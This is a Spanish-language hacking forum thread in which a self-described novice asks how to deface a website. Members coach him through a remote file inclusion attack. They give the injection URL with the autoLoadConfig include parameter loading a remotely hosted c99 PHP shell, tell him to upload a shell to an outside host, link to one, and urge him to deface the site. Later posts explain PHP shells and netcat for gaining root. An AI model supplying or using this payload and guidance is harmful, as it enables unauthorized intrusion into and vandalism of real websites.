Hola a todos los de este foro........., ya que ni digo que soy nuevo. o bueno, a lo mejor si, pero con otra cuenta ahora..... Por lo que veo, lo que siempre me he dado cuenta que colaboran mucho y se ve que saben son Freshive, Komtec1, Porq69 y entre otros, no es que sea barbero ni nada..... :D
Bueno, ....... este es mi problema.....:
Quiero defacear una web y me salen un exploit grave que es por medio de CGI Scripts, y le doy en el número de Bugtraq y a exploit y todo en el sss, pero lo que me sale en el exploit es lo siguiente:
http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
Lo que me pregunto yo....... que es lo que tengo que hacer ahi???.....
Lo qe si digo que arriba de CVE en el sss en donde dice script dice esto:
<A href="http://www.ipunkrock.com/index.php?" target="_default">http://www.ipunkrock.com/index.php?</A>
Pero nosé que es lo que tengo que hacer ahí, porfavor que alguien me ayude.... ya que soy muy novato y quisiera introducirme a lo de defacear webs, ya que me gusta, bueno, todo lo relacionado con los ordenadores..... espero y que me puedan ayudar,.... hasta luego..
Bueno en primero que creo que la paguina que quieres defacear creo es http://www.ipunkrock.com ..
Ahora pues mira el SSS Analisa las vulnerabilidades del server mas que la paguina.. Mejor analizala con Acunetix.. y ve las vulnerablidades que tiene.. ya lo hice por ti me dice que solo tiene el TRACE METHOD..
Buscate una shell o un exploit.. hay te da creo yo la respuesta..
A mi también me dió eso de Trace Method Enable, pero parece que va a ser muy complicado para mi que apenas soy muy newbie en lo del defacing, creo que mejor buscaré otro sitio web para defacear, ya que eh buscado otros con el sss y me han salido muy vulnerables y eh encontrado su exploit pero al momento de ver el exploit viene con letras, como dando instrucciones en ingles, y pues de códigos de programación nosé casi nada y no me funcionó el exploit al quererlo compilar, mejor te posteo otra duda cuando tenga un sitio con su exploit para compilarlo, ya que me gustaría que me ayudaras en el código del exploit diciéndome u orientando para lograr el deface, ah y porciero, me recomiendas que busque con acuentix o el sss,........ y gracias por tu ayuda...... :D .
de verdad te agradecería mucho que aceptaras ayudarme a orientarme a defacear......
Pues lo que tienes que hacer es buscar una shell, subirla en algun server o host, e incluirla en esta inyeccion
http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=AQUI VA TU SHELL!!!
Intenta eso amigo ;)
Hijole TH6, me la pusiste mas dificial amigo, ??? .,, ya que nosé ni siquiera lo de las shell y no conosco bien eso de las shell, estoy googleando eso pero por lo que veo y ya había habisto, solamente shell para linux, y pues linux no lo estoy usando ahorita, ya que acabo de formatear mi ordenador y le dejé nomás puro Windows, :( , y pues la neta, perdona por mi ignorancia :-\ pero pues sinceramente nosé nada de defacing y pues quiero aprender.. :'( ...., pero ese código que escribiste creo haberlo visto en un exploit de una vulnerabilidad de un sitio web que scanie con el sss, pero no le entendí nada y pues mejor lo dejé, pero bueno pues nimodo, voy a scanear bien otra web que quiero de una universidad con el acuentix y con el sss, y te plantearé las vulnerabilidades para que me orientes si es que puedes, por favor, y a proposito, nosé si alguien ha probado los cursos hacker de la web http://www.cursoshacker.com (http://www.cursoshacker.com), para ver que me recomiendan de ese sitio, si para mas adelante con mis ahorros poder inscribirme a los cursos, bueno eso es todo, y gracias por su ayuda y gracias de nuevo TH6...
una shell no es un programa xD una shell apra defacear es un .txt que ejecutas remotamente para controlar por asi decirlo la web... entras como si fueras admin...
Donde dice shell tenes que poner la URL de la shell a ejecutar... queres una shell para probar? fijate que cree un topic en hack gral posteando una... pone el link que puse yo donde dice shell..
Y listo despues defacea la web como tengas ganas :D igual no seas mala onda... no le rompas todo... decile nada mas donde esta el problema :)
http://hackpr.net/foro/index.php?topic=5869.0
Ahi ta la URL :P
??? ??? ??? ??? , chale, creo que me revolví mas brother, la verdad creo que necesito unos cursos con profesor y todo porque no entiendo casi nada, esa shell, no es que se tiene que compilar o interpretar acaso???...., la verdad te pido que me digas bien los pasos de como, cuando, y porque, etc..., como si no supiera nada ( ya que sinceramente nose nada), para entender cada vez mejor... pero bueno, voy a escanear la web que quiero defacear con el sss y con el acuentix y te postearé los resultados para ver que puedo hacer,.... y a proposito... que quieres decir con eso de que no sea mala onda y nose que mas...????, la verdad no me acuerdo de lo demás....
......... Pero de todos modos, gracias por tu aportación brother...... :)
Quote from: ¹SlowEmotion² on December 04, 2006, 06:56:15 PM
una shell no es un programa xD una shell apra defacear es un .txt que ejecutas remotamente para controlar por asi decirlo la web... entras como si fueras admin...
Donde dice shell tenes que poner la URL de la shell a ejecutar... queres una shell para probar? fijate que cree un topic en hack gral posteando una... pone el link que puse yo donde dice shell..
Y listo despues defacea la web como tengas ganas :D igual no seas mala onda... no le rompas todo... decile nada mas donde esta el problema :)
http://hackpr.net/foro/index.php?topic=5869.0
Ahi ta la URL :P
Ya pero dices que esa web es vulnerable a tu Shell que posteaste(lo posteaste tu mas no es tuyo) deja pruebo..
Pero te falto ya que como es una web y se maneja en php.. genrealemten.. pues lo pones en .txt y no en el formato de la web y al final se agrega el "?" para poder ser ejecutado en la web ej.
http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://usuarios-lycos.es/lol/c99.txt?
=)
Si nadamas busca un shell que sirva y yo ten ayudo a ponerlo =) .. y sigue preguntando tus dudas.
Ok brother, te agradezco mucho y a todos lo que me ayudaron en esto, investigaré y trataré de conceguir, por ahí en el foro vi que hablaban mucho de una shell llamada c999 algo asi, pero veré que puedo hacer, ya que estoy scaneando la web con el acuentix ahorita y ha encontrado como 256 de nivel alto y 224 de nivel bajo... ;D
............Gracias a todos los que me ayudaron........
Ya sabes para eso estamos.. mas dudas postealas.. =)
ola xicos tengo un problema mi empresa me a pedido q intente meterme en el area privada de la web para ver las vulneravilidades de la misma, el acunetix me da una cuantas pero un xico me dijo q tenia todos los puertos cerrados.... y q no iba a poder. me gustaria saber si es vulnerable o no por q tengo q redactar un informe con todo l oq e exo y los consejos.......kien me ayuda? es urgente, ademas se q tienen un servidor con un savi q me dijo mi tio (que es el dueño de la empresa) que era diferente al resto y la contraseña tiene 6 digitos xo no tengo nombre de usuario...... la pagina es www.abaste.com, x cierto otro detalle tb me dijo mi tio q a pagina q me muestra no es real es una agina dinamica generada automaticamente y q no existe... eso q significa??? gracias...
Esto no deberia ir en otro tema?
Quote from: Pretender on December 05, 2006, 05:53:52 AM
ola xicos tengo un problema mi empresa me a pedido q intente meterme en el area privada de la web para ver las vulneravilidades de la misma, el acunetix me da una cuantas pero un xico me dijo q tenia todos los puertos cerrados.... y q no iba a poder. me gustaria saber si es vulnerable o no por q tengo q redactar un informe con todo l oq e exo y los consejos.......kien me ayuda? es urgente, ademas se q tienen un servidor con un savi q me dijo mi tio (que es el dueño de la empresa) que era diferente al resto y la contraseña tiene 6 digitos xo no tengo nombre de usuario...... la pagina es www.abaste.com, x cierto otro detalle tb me dijo mi tio q a pagina q me muestra no es real es una agina dinamica generada automaticamente y q no existe... eso q significa??? gracias...
Explicate mejor brother!!
TEMA CERRADO POR fresHJive
Abre otro post por explicando tu problema
cMr_Newbie si tienes mas dudas mandas un mensaje privado a cual kier moderador para que reabra el tema
Quote from: ¹SlowEmotion² on December 04, 2006, 06:56:15 PM
una shell no es un programa xD una shell apra defacear es un .txt que ejecutas remotamente para controlar por asi decirlo la web... entras como si fueras admin...
Donde dice shell tenes que poner la URL de la shell a ejecutar... queres una shell para probar? fijate que cree un topic en hack gral posteando una... pone el link que puse yo donde dice shell..
Y listo despues defacea la web como tengas ganas :D igual no seas mala onda... no le rompas todo... decile nada mas donde esta el problema :)
http://hackpr.net/foro/index.php?topic=5869.0
Ahi ta la URL :P
tenemos ke aclarar algo ke es muy confundido ultimamente ke aka como vemos kazin aki tambien se confundio ... el concepto de shell seria un terminal que nos permite ejecutar comandos ..-
Haora marquemos las diferencias entre shell del sistema y shell en php
shell php: Estas shell mediante codigo en php se aprovechan de bugs de rfi y haciendo la inclusion de la shell podemos ejecutar comandos, editar archivos,etc
no trabajan en tiempo real , ya ke pasan por muchos filtros .. asi ke por lo tanto no se usan para r00tear!
Bien la shell de sistema es la consola, si estas en windows el ms-dos y esta en linux la terminal.........
Otra seria el netcat....es otro ejemplo de shell de sistema.
Este tipo de Shell trabaja mas directamente con el servidor y se usa para rootear